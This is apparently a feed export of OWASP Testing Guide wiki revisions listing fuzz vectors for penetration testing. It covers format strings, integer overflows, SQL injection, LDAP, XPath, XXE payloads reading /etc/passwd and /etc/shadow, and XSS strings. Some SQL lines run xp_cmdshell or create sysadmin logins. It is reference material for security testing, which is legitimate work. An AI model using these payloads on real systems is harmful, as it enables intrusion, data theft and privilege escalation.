 &amp;lt;nowiki&amp;gt;%.2049d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%p%p%p%p&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%x%x%x%x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%d%d%d%d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%s%s%s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%99999999999s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%08x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20d&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20n&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20x&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%%20s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s%s%s%s%s%s%s%s%s%s&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%p%p%p%p%p%p%p%p%p%p&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%s x 129&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%x x 257&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Integer Overflows (INT) ====&lt;br /&gt;
&lt;br /&gt;
Integer overflow errors occur when a program fails to account for the fact that an arithmetic operation can result in a quantity either greater than a data type's maximum value or less than its minimum value. If an attacker can cause the program to perform such a memory allocation, the program can be potentially vulnerabie to a buffer overflow attack.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;-1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x100&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x1000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x3fffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x7ffffffe&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x7fffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x80000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0xfffffffe&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0xffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x10000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;0x100000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection ===&lt;br /&gt;
&lt;br /&gt;
This attack can affect the database layer of an application and is typically present when user input is not filtered for SQL statements.&lt;br /&gt;
&lt;br /&gt;
For details on Testing SQL Injection: [[Testing_for_SQL_Injection]]&lt;br /&gt;
&lt;br /&gt;
SQL Injection is classified in the following two categories, depending on the exposure of database information (passive) or the alteration of database information (active).&lt;br /&gt;
&lt;br /&gt;
* Passive SQL Injection&lt;br /&gt;
* Active SQL Injection&lt;br /&gt;
&lt;br /&gt;
Active SQL Injection statements can have a detrimental effect on the underllying database if successfully executed.&lt;br /&gt;
&lt;br /&gt;
==== Passive SQL Injection (SQP) ====&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'||(elt(-3+5,bin(15),ord(10),hex(char(45))))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;||6&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'||'6&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;(||6)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 1=1--&amp;lt;/nowiki&amp;gt; &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;OR 1=1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR '1'='1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;; OR '1'='1'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+--+&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot; or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1=1 /*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;or 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 'a'='a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot; or &amp;quot;a&amp;quot;=&amp;quot;a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;') or ('a'='a&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;Admin' OR '&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' group by userid having 1=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1 in (select @@version)--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union all select @@version--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'unusual' = 'unusual'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'something' = 'some'+'thing'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'text' = N'text'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'something' like 'some%'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 2 &amp;gt; 1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'text' &amp;gt; 't'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 'whatever' in ('whatever')&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' OR 2 BETWEEN 1 and 3&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or username like char(37);&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select * from users where login = char(114,111,111,116);&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;Password:*/=1--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;UNI/**/ON SEL/**/ECT&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; EXEC ('SEL' + 'ECT US' + 'ER')&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'/**/OR/**/1/**/=/**/1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' or 1/*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+OR+%277659%27%3D%277659&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%22+or+isnull%281%2F0%29+%2F*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%27+--+&amp;amp;password=&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login &amp;gt; &lt;br /&gt;
 @var select @var as var into temp end --&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' and 1 in (select var from temp)--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' union select 1,load_file('/etc/passwd'),1,1,1;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' and 1=( if((load_file(char(110,46,101,120,116))&amp;lt;&amp;gt;char(39,39)),1,0));&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Active SQL Injection (SQI) ====&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'; exec master..xp_cmdshell 'ping 10.10.1.2'--&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY 'pass123'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;' ; drop table temp --&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;exec sp_addlogin 'name' , 'password'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;exec sp_addsrvrolemember 'name' , 'sysadmin'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;GRANT CONNECT TO name; GRANT RESOURCE TO name;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) &lt;br /&gt;
 + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== LDAP Injection ===&lt;br /&gt;
&lt;br /&gt;
For details on LDAP Injection: [[LDAP_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;|&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;!&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;(&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%28&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%26&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%21&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%7C&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*|&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%7C&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*(|(mail=*))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%28%7C%28mail%3D%2A%29%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*(|(objectclass=*))&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;%2A%28%7C%28objectclass%3D%2A%29%29&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*()|%26'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;admin*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;admin*)((|userPassword=*)&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*)(uid=*))(|(uid=*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XPATH Injection ===&lt;br /&gt;
&lt;br /&gt;
For details on XPATH Injection: [[XPath_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'+or+'1'='1&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'+or+''='&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;x'+or+1=1+or+'x'='y&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;/&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;//&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;//*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;*/*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;@*&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;count(/child::node())&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;x'+or+name()='username'+or+'x'='y&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Injection ===&lt;br /&gt;
&lt;br /&gt;
Details on XML Injection here: [[XML_Injection_Testing_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;![CDATA[&amp;lt;script&amp;gt;var n=0;while(true){n++;}&amp;lt;/script&amp;gt;]]&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[&amp;lt;]]&amp;gt;SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;alert('gotcha');&amp;lt;![CDATA[&amp;lt;]]&amp;gt;/SCRIPT&amp;lt;![CDATA[&amp;gt;]]&amp;gt;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;foo&amp;gt;&amp;lt;![CDATA[' or 1=1 or ''=']]&amp;gt;&amp;lt;/foof&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file://c:/boot.ini&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///etc/shadow&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&amp;lt;!DOCTYPE foo [&amp;lt;!ELEMENT foo ANY&amp;gt;&amp;lt;!ENTITY xxe SYSTEM &amp;quot;file:///dev/random&amp;quot;&amp;gt;]&amp;gt;&amp;lt;foo&amp;gt;&amp;amp;xee;&amp;lt;/foo&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Subere</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=14338</id>
		<title>OWASP Testing Guide Appendix C: Fuzz Vectors</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors&amp;diff=14338"/>
				<updated>2006-12-13T23:56:23Z</updated>
		
		<summary type="html">&lt;p&gt;Subere: /* SQL Injection */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The following are fuzzing vectors which can be used with [[WebScarab]], [[JBroFuzz]], [[WSFuzzer]], or another fuzzer.&lt;br /&gt;
Fuzzing is the &amp;quot;kitchen sink&amp;quot; approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing.&lt;br /&gt;
This is the simple part of the discovery phase.&lt;br /&gt;
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.&lt;br /&gt;
&lt;br /&gt;
=== Fuzz Categories ===&lt;br /&gt;
&lt;br /&gt;
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:&lt;br /&gt;
&lt;br /&gt;
* Recursive fuzzing&lt;br /&gt;
* Replacive fuzzing&lt;br /&gt;
&lt;br /&gt;
We examine and define each category in the sub-sections that follow. &lt;br /&gt;
&lt;br /&gt;
==== Recursive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Selecting &amp;quot;8302fa3b&amp;quot; as a part of the request to be fuzzed against the set hexadecimal alphabet i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f} falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/00000000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/11000fff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;...&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/ffffffff&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Replacive fuzzing ====&lt;br /&gt;
&lt;br /&gt;
Replacive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/8302fa3b&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;http://www.example.com/'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This is a form of replacive fuzzing. In this category, the total number of requests is dependant on the number of fuzz vectors specified. &lt;br /&gt;
&lt;br /&gt;
The remainder of this appendix presents a number of fuzz vector categories.&lt;br /&gt;
&lt;br /&gt;
=== Cross Site Scripting (XSS) ===&lt;br /&gt;
&lt;br /&gt;
For details on XSS: [[Cross_site_scripting_AoC]]&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&amp;amp;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;STYLE&amp;gt;@import&amp;quot;javascript:alert('XSS')&amp;quot;;&amp;lt;/STYLE&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;'&amp;gt;&amp;lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;&lt;br /&gt;
 alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;%22%27&amp;gt;&amp;lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;gt;&amp;quot;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt; &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;amp;amp;quot;XSS&amp;lt;WBR&amp;gt;&amp;amp;amp;quot;)&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;amp;#106;&amp;amp;amp;#97;&amp;amp;amp;#118;&amp;amp;amp;#97;&amp;amp;amp;&amp;lt;WBR&amp;gt;#115;&amp;amp;amp;#99;&amp;amp;amp;#114;&amp;amp;amp;#105;&amp;amp;amp;#112;&amp;amp;amp;&amp;lt;WBR&amp;gt;#116;&amp;amp;amp;#58;&amp;amp;amp;#97;&lt;br /&gt;
 &amp;amp;amp;#108;&amp;amp;amp;#101;&amp;amp;amp;&amp;lt;WBR&amp;gt;#114;&amp;amp;amp;#116;&amp;amp;amp;#40;&amp;amp;amp;#39;&amp;amp;amp;#88;&amp;amp;amp;#83&amp;lt;WBR&amp;gt;;&amp;amp;amp;#83;&amp;amp;amp;#39;&amp;amp;amp;#41&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;&amp;lt;WBR&amp;gt;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;&amp;lt;WBR&amp;gt;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;&amp;lt;WBR&amp;gt;#0000112&amp;amp;#0000116&amp;amp;#0000058&lt;br /&gt;
 &amp;amp;&amp;lt;WBR&amp;gt;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;&amp;lt;WBR&amp;gt;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;&amp;lt;WBR&amp;gt;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;&amp;lt;WBR&amp;gt;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;           &lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;IMGSRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;&amp;lt;WBR&amp;gt;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;&amp;lt;WBR&amp;gt;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&lt;br /&gt;
